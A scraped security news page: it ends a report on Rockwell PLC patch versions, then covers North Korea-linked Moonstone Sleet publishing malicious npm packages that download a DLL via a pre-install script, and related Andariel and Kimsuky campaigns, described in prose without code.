*   GuardLogix 5580 (1756-L8zS): Update to versions V32.016, V33.015, V34.014, V35.011 and later.
    
*   1756-EN4TR: Update to versions V5.001 and later.
    
*   1756-EN2T Series D, 1756-EN2F Series C, 1756-EN2TR Series C, 1756-EN3TR Series B, and 1756-EN2TP Series A: Update to version V12.001 and later
    

**About the Author**

Tara Seals has 20+ years of experience as a journalist, analyst and editor in the cybersecurity, communications and technology space. Prior to Dark Reading, Tara was Editor in Chief at Threatpost, and prior to that, the North American news lead for Infosecurity Magazine. She also spent 13 years working for Informa (formerly Virgo Publishing), as executive editor and editor-in-chief at publications focused on both the service provider and the enterprise arenas. A Texas native, she holds a B.A. from Columbia University, lives in Western Massachusetts with her family and is on a never-ending quest for good Mexican food in the Northeast.

Rockwell PLC Security Bypass Threatens Manufacturing Processes

The North Korea-linked threat actor known as Moonstone Sleet has continued to push malicious npm packages to the JavaScript package registry with the aim of infecting Windows systems, underscoring the persistent nature of their campaigns.
The packages in question, harthat-api and harthat-hash, were published on July 7, 2024, according to Datadog Security Labs. Both the libraries did not attract

Malware / Windows Security

The North Korea-linked threat actor known as **Moonstone Sleet** has continued to push malicious npm packages to the JavaScript package registry with the aim of infecting Windows systems, underscoring the persistent nature of their campaigns.

The packages in question, harthat-api and harthat-hash, were published on July 7, 2024, according to Datadog Security Labs. Both the libraries did not attract any downloads and were shortly pulled after a short period of time.

The security arm of the cloud monitoring firm is tracking the threat actor under the name Stressed Pungsan, which exhibits overlaps with a newly discovered North Korean malicious activity cluster dubbed Moonstone Sleet.

"While the name resembles the Hardhat npm package (an Ethereum development utility), its content does not indicate any intention to typosquat it," Datadog researchers Sebastian Obregoso and Zack Allen said. "The malicious package reuses code from a well-known GitHub repository called node-config with over 6,000 stars and 500 forks, known in npm as config."

Attack chains orchestrated by the adversarial collective are known to disseminate bogus ZIP archive files via LinkedIn under a fake company name or freelancing websites, enticing prospective targets into executing payloads that invoke an npm package as part of a supposed technical skills assessment.

"When loaded, the malicious package used curl to connect to an actor-controlled IP and drop additional malicious payloads like SplitLoader," Microsoft noted in May 2024. "In another incident, Moonstone Sleet delivered a malicious npm loader which led to credential theft from LSASS."

Subsequent findings from Checkmarx uncovered that Moonstone Sleet has also been attempting to spread their packages through the npm registry.

The newly discovered packages are designed to run a pre-install script specified in the package.json file, which, in turn, checks if it's running on a Windows system ("Windows\_NT"), after which it contacts an external server ("142.111.77\[.\]196") to download a DLL file that's side loading using the rundll32.exe binary.

The rogue DLL, for its part, does not perform any malicious actions, suggesting either a trial run of its payload delivery infrastructure or that it was inadvertently pushed to the registry before embedding malicious code into it.

The development comes as South Korea's National Cyber Security Center (NCSC) warned of cyber attacks mounted by North Korean threat groups tracked as Andariel and Kimsuky to deliver malware families such as Dora RAT and TrollAgent (aka Troll Stealer) as part of intrusion campaigns aimed at construction and machinery sectors in the country.

The Dora RAT attack sequence is noteworthy for the fact that the Andariel hackers exploited vulnerabilities in a domestic VPN software's software update mechanism to propagate the malware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#mac